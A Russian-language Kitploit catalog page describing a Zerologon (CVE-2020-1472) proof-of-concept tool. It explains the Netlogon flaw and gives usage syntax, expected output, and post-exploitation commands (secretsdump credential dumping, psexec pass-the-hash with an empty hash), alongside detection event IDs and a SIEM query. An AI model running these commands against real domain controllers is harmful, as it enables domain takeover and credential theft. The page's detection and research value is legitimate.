Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ZeroLogon-PoC-DC-Pwn — Zerologon (CVE-2020-1472) — приложение для Proof-of-Concept — критический инструмент эксплуатации уязвимости Active Directory. | Kitploit
Инструменты/GitHubGitHub/mods20hh/zerologon-poc-dc-pwn
Повышение привилегийАтаки на ПаролиАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеСтатьи и ИсследованияОбучение и ОбразованиеRed Teaming
GitHubmods20hh/zerologon-poc-dc-pwn

ZeroLogon-PoC-DC-Pwn

Zerologon (CVE-2020-1472) — приложение для Proof-of-Concept — критический инструмент эксплуатации уязвимости Active Directory.

4325 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

Zerologon (CVE-2020-1472)

Обзор

Этот проект представляет собой реализацию уязвимости Zerologon (CVE-2020-1472), одной из самых критических уязвимостей безопасности Active Directory. Данная уязвимость позволяет неаутентифицированному злоумышленнику скомпрометировать весь домен Active Directory, сбрасывая пароль учетной записи компьютера контроллера домена.

Оценка CVSS: 10.0 (Критическая)

Что такое Zerologon?

Zerologon — это криптографический дефект в протоколе удаленного входа в систему Microsoft Netlogon (MS-NRPC). Уязвимость заключается в том, как Netlogon использует шифрование AES-CFB8 с жестко заданным вектором инициализации (IV), равным нулю.

Краткое техническое описание:

  • Протокол Netlogon использует механизм аутентификации «запрос-ответ» (challenge-response)
  • Из-за неправильной криптографической реализации нулевой запрос (all-zero challenge) с вероятностью 1/256 приводит к успешной аутентификации
  • Злоумышленник может отправить около 2000 попыток аутентификации, чтобы надежно использовать этот дефект
  • После успешной аутентификации злоумышленник может сбросить пароль учетной записи компьютера контроллера домена на известное значение (пустой хеш)

Как это работает

root@kitploit:~
1. Выбор цели
   └─> Определение контроллера домена (FQDN, NetBIOS-имя, учетная запись компьютера)

2. Фаза запроса (I_NetServerReqChallenge)
   └─> Отправка нулевого клиентского запроса (0x0000000000000000)
   └─> Получение запроса сервера

3. Фаза аутентификации (I_NetServerAuthenticate2)
   └─> Попытка аутентификации с пустыми учетными данными
   └─> Повтор до успеха (~1/256 успешных попыток)

4. Фаза сброса пароля (I_NetServerPasswordSet2)
   └─> Сброс пароля учетной записи компьютера контроллера домена на пустой
   └─> Новый NT-хеш: 31d6cfe0d16ae931b73c59d7e0c089c0 (пустой пароль)

5. Пост-эксплуатация
   └─> Использование Pass-the-Hash с пустыми учетными данными
   └─> Полная компрометация домена

Сборка проекта

Необходимые компоненты

  • Среда разработки Windows (Windows 10/11)
  • Visual Studio 2022
  • Windows SDK

Компиляция

Использование Visual Studio:

root@kitploit:~
1. Откройте Visual Studio
2. Выберите **Build Solution** в меню **Build**.

Использование

root@kitploit:~
Zerologon.exe <DC_FQDN> <DC_NetBIOS_Name> <Machine_Account_Name>

Пример:

root@kitploit:~
Zerologon.exe DC01.corp.example.com DC01 DC01$

Параметры:

  • DC_FQDN: Полное доменное имя целевого контроллера домена
  • DC_NetBIOS_Name: NetBIOS-имя контроллера домена (обычно имя хоста)
  • Machine_Account_Name: Имя учетной записи компьютера (должно заканчиваться на $)

Ожидаемый вывод:

Успешная эксплуатация:

root@kitploit:~
[+] Целевой контроллер домена:
    FQDN           : DC01.corp.example.com
    NetBIOS-имя    : DC01
    Учетная запись : DC01$

[+] УСПЕХ: Пароль учетной записи компьютера сброшен на пустой!
[+] Теперь используйте Pass-the-Hash с:
      .\DC01$:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
[+] Затем выполните: secretsdump.py -just-dc <domain>/<dc_account>@<dc_ip>

Неудачная эксплуатация (система исправлена):

root@kitploit:~
[-] Атака не удалась после 2000 попыток. Цель, вероятно, исправлена.

Пост-эксплуатация

После успешного сброса пароля контроллера домена вы можете:

  1. Извлечь учетные данные домена:
root@kitploit:~
secretsdump.py -no-pass -just-dc 'DOMAIN/DC01$'@192.168.1.10
  1. Аутентификация Pass-the-Hash:
root@kitploit:~
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 'DOMAIN/DC01$'@DC01

Обнаружение

Сетевое обнаружение:

  • Множественные неудачные попытки аутентификации Netlogon с одного источника
  • Необычные шаблоны в трафике MS-NRPC
  • Сигнатуры IDS/IPS для эксплуатации Zerologon

Обнаружение по журналам:

root@kitploit:~
Просмотр событий → Журналы Windows → Система
- Идентификатор события 5827: Множественные сбои проверки пароля
- Идентификатор события 5829: Сброс защищенного канала

Запросы SIEM:

root@kitploit:~
source="WinEventLog:System" EventCode=5827 OR EventCode=5829
| stats count by Computer, SourceIP
| where count > 100

Отказ от ответственности

Этот инструмент предоставляется только для образовательных целей и авторизованных исследований безопасности.

Автор не несет НИКАКОЙ ответственности за неправомерное использование этого кода.

Ссылки

Официальные ресурсы:

  • CVE-2020-1472 — NIST
  • Бюллетень безопасности Microsoft
  • Исследовательская работа Secura

Технический анализ:

  • Спецификация протокола Netlogon от Microsoft
  • Углубленный технический разбор Zerologon

Инструменты:

  • Impacket Toolkit — для пост-эксплуатации
  • Mimikatz — извлечение учетных данных

Лицензия

Этот проект лицензирован по лицензии MIT. Дополнительную информацию см. в файле LICENSE.

Скачать инструмент